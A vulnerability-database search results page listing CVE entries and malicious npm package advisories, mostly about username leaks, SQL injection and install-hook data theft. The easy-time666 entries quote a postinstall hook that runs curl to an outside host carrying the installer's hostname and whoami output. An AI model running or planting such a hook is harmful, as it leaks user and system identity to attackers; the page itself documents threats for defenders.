Lucene search
K

38 matches found

Cvelist
Cvelist
added 2 days ago28 views

CVE-2026-55417 Chevereto private profile setting leaks username on /json endpoint

Chevereto is a self-hosted media-sharing platform. Starting in version 3.7.5 and prior to version 4.5.4, when a user enables the private profile option, visiting their profile HTML route /username correctly returns 404. However, the /json AJAX listing endpoint does not apply the same check. An...

6.9CVSS0.00249EPSS
Exploits0References2
OSV
OSV
added 2026/06/13 12:23 p.m.11 views

MAL-2026-5749 Malicious code in easy-time666 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22 package.json declares a postinstall hook that runs curl http://npm.wdf1.eyes.sh/pre?h=$hostname&u=&whoami over plain HTTP on every npm install, leaki...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/13 12:23 p.m.16 views

Malicious code in easy-time666 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22 package.json declares a postinstall hook that runs curl http://npm.wdf1.eyes.sh/pre?h=$hostname&u=&whoami over plain HTTP on every npm install, leaki...

5.9AI score
Exploits0References2
OSV
OSV
added 2026/06/11 1:22 a.m.10 views

MAL-2026-5540 Malicious code in @monitoring-lib/error-tracking (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 491603ad44ed812c3d248696b00f7d4801a4c1dc23e4f23a3bb86f2ef499616d On npm install, the preinstall lifecycle hook in package.json runs a Node one-liner that reads the installer's hostname os.hostname and username...

5.5AI score
Exploits0References2
OSV
OSV
added 2026/06/09 5:35 p.m.10 views

MAL-2026-5417 Malicious code in @klapp-sca/routes (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 495f510483f297a56d545e8555db20eb54569f904bfd71853e54a18d89812cb0 package.json declares "preinstall": "node index.js || true", so on every npm install the bundled index.js runs automatically and collects os.hostname...

5.5AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/24 3:52 p.m.12 views

Malicious code in power-platform-playwright-toolkit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 57967d58233d74f2fc4f9b0dee7c050370eb388050df8d63f29e719f83468d73 On npm install, the package's postinstall script postinstall.js collects host identifiers and CI context — whoami, os.hostname, os.platform, cwd, CI,...

5.8AI score
Exploits0References2
CNNVD
CNNVD
added 2026/04/01 12:0 a.m.7 views

Sage DPW 安全漏洞

Sage DPW is a human resources system developed by the British company Sage. Version Sage DPW 202106004 contains a security vulnerability. This vulnerability stems from the login mechanism, which responds differently to valid and invalid usernames. It may lead to the enumeration of existing accoun...

5.3CVSS5.8AI score0.00264EPSS
Exploits0References2
NVD
NVD
added 2026/03/06 1:16 p.m.7 views

CVE-2018-25179

Gumbo CMS 0.99 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the language parameter. Attackers can send POST requests to the settings endpoint with crafted SQL payloads in the language parameter t...

8.8CVSS0.00237EPSS
Exploits0References2
Debian CVE
Debian CVE
added 2026/02/03 12:11 a.m.5 views

CVE-2025-61646

Vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files includes/RecentChanges/EnhancedChangesList.Php. This issue affects MediaWiki: from before 1.39.14, 1.43.4, 1.44.1...

5.4CVSS5.2AI score0.00234EPSS
Exploits0
ATTACKERKB
ATTACKERKB
added 2026/01/29 2:28 p.m.4 views

CVE-2020-37004

The Ultimate Project Manager CRM PRO version 2.0.5 contains a blind SQL injection vulnerability that allows attackers to extract usernames and password hashes from the tblusers database table. Attackers can exploit the /frontend/getarticlesuggestion/ endpoint by crafting malicious search paramete...

8.2CVSS5.9AI score0.00221EPSS
Exploits0References3Affected Software1
Cvelist
Cvelist
added 2026/01/22 9:2 p.m.31 views

CVE-2025-22234 Spring Security - BCrypt Password Encoder maximum password length breaks timing attack mitigation

The fix applied in CVE-2025-22228 inadvertently broke the timing attack mitigation implemented in DaoAuthenticationProvider. This can allow attackers to infer valid usernames or other authentication behavior via response-time differences under certain configurations...

5.3CVSS0.00402EPSS
Exploits0References1
CNNVD
CNNVD
added 2026/01/22 12:0 a.m.9 views

Spring Security security vulnerabilities

Spring Security is a security framework developed by Spring, an open-source project, that includes authentication and authorization features. Spring Security has security vulnerabilities; these vulnerabilities stem from the timing attack mitigation measures in the DaoAuthenticationProvider being...

5.3CVSS5.8AI score0.00402EPSS
Exploits0References1
Tenable Nessus
Tenable Nessus
added 2026/01/16 12:0 a.m.4 views

MiracleLinux 7 : authconfig-6.2.8-30.el7 (AXSA:2017-1892:01)

The remote MiracleLinux 7 host has packages installed that are affected by a vulnerability as referenced in the AXSA:2017-1892:01 advisory. Authconfig is a command line utility which can configure a workstation to use shadow more secure passwords. Authconfig can also configure a system to be a...

4.3CVSS5.3AI score0.01445EPSS
Exploits0References2
NVD
NVD
added 2025/12/30 4:15 p.m.4 views

CVE-2025-64528

Discourse is an open source discussion platform. Prior to versions 3.5.3, 2025.11.1, and 2025.12.0, an attacker who knows part of a username can find the user and their full name via UI or API, even when enablenames is disabled. Versions 3.5.3, 2025.11.1, and 2025.12.0 contain a fix...

6.3CVSS0.00242EPSS
Exploits0References4
RedHat Linux
RedHat Linux
added 2025/10/27 4:55 p.m.5 views

squid-cache: Squid vulnerable to information disclosure via authentication credential leakage in error handling

A Information Disclosure vulnerability has been identified in the Squid web caching proxy. This flaw occurs when the application fails to properly redact sensitive Hypertext Transfer Protocol HTTP authentication credentials from an error response. A remote client can exploit this by triggering an...

10CVSS5.8AI score0.6332EPSS
Exploits1References6
EUVD
EUVD
added 2025/10/07 12:30 a.m.5 views

EUVD-2011-2498

Malware in sbrugna...

5CVSS6AI score0.02497EPSS
Exploits0References12
EUVD
EUVD
added 2025/10/07 12:30 a.m.4 views

EUVD-2007-0312

Malware in sbrugna...

5CVSS6.4AI score0.01816EPSS
Exploits0References11
Positive Technologies
Positive Technologies
added 2025/08/19 12:0 a.m.9 views

PT-2025-33715 · Sma Solar Technology · Sunny Portal

Name of the Vulnerable Software and Affected Versions: Sunny Portal affected versions not specified Description: A low-privileged remote attacker can obtain the username of another registered user by entering that user's email address. Recommendations: At the moment, there is no information about...

6.5CVSS7AI score0.00335EPSS
Exploits0References5
Tenable Nessus
Tenable Nessus
added 2025/08/19 12:0 a.m.2 views

Linux Distros Unpatched Vulnerability : CVE-2019-12953

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Dropbear 2011.54 through 2018.76 has an inconsistent failure delay that may lead to revealing valid usernames, a different issue than CVE-2018-15599...

5.3CVSS7AI score0.02709EPSS
Exploits0References2
NVD
NVD
added 2025/07/10 7:15 p.m.13 views

CVE-2025-53625

The DynamicPageList3 extension is a reporting tool for MediaWiki, listing category members and intersections with various formats and details. Several dpl parameters can leak usernames that have been hidden using revision deletion, suppression, or the hideuser block flag. The vulnerability is fix...

8.7CVSS0.00447EPSS
Exploits0References2
Rows per page
Query Builder